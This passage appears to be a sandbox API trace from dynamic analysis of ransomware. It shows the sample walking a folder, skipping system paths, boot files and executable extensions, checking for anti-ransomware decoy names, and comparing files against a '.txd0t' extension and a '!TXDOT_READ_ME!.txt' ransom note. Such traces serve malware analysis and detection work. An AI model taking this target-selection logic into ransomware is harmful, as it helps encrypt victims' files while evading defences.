ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0071.078] StrCmpW (psz1="1031", psz2=".") returned 1 [0071.078] StrCmpW (psz1="1031", psz2="..") returned 1 [0071.078] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.078] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.079] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1031", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system32\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\local\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\boot\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\perflogs\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\programdata\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\drivers\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\wsus\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="crypt_detect") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="cryptolocker") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="ransomware") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\WINDOWS") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.079] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files") returned 0x0 [0071.079] GetProcessHeap () returned 0xe30000 [0071.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.079] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0071.079] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\*") returned="C:\\588bce7c90097ed212\\1031\\*" [0071.079] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0071.080] StrCmpW (psz1=".", psz2=".") returned 0 [0071.080] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.080] StrCmpW (psz1="..", psz2=".") returned 1 [0071.080] StrCmpW (psz1="..", psz2="..") returned 0 [0071.080] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.080] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.080] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.080] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0071.080] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0071.080] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="C:\\588bce7c90097ed212\\1031\\eula.rtf" [0071.080] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.080] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.080] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.080] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.080] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.081] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.081] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.081] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.081] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.081] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.081] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.081] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.081] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.081] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.081] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.081] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.081] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.081] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0071.081] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0071.081] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0071.081] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.081] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.081] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.081] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.081] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.081] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.081] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.082] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.082] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.082] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.082] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.082] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.082] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.082] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.082] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.082] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.083] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.083] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.083] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.083] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0071.083] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0071.083] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" [0071.083] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.083] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.083] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.083] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.083] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.084] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.084] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.084] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.084] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.084] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0071.084] GetProcessHeap () returned 0xe30000 [0071.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.084] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0071.084] StrCmpW (psz1="1032", psz2=".") returned 1 [0071.084] StrCmpW (psz1="1032", psz2="..") returned 1 [0071.084] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.084] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.084] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1032", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system32\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\local\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.084] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\boot\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\perflogs\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\programdata\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\drivers\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\wsus\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="crypt_detect") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="cryptolocker") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="ransomware") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\WINDOWS") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.085] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files") returned 0x0 [0071.085] GetProcessHeap () returned 0xe30000 [0071.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.085] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0071.085] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\*") returned="C:\\588bce7c90097ed212\\1032\\*" [0071.085] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0071.086] StrCmpW (psz1=".", psz2=".") returned 0 [0071.086] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.086] StrCmpW (psz1="..", psz2=".") returned 1 [0071.086] StrCmpW (psz1="..", psz2="..") returned 0 [0071.086] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.086] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.086] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.086] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0071.086] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0071.086] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="C:\\588bce7c90097ed212\\1032\\eula.rtf" [0071.086] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.086] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.086] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.087] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.087] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.087] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.087] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.087] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.087] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.087] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.087] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.087] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.087] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.087] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.087] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.087] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.087] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.087] 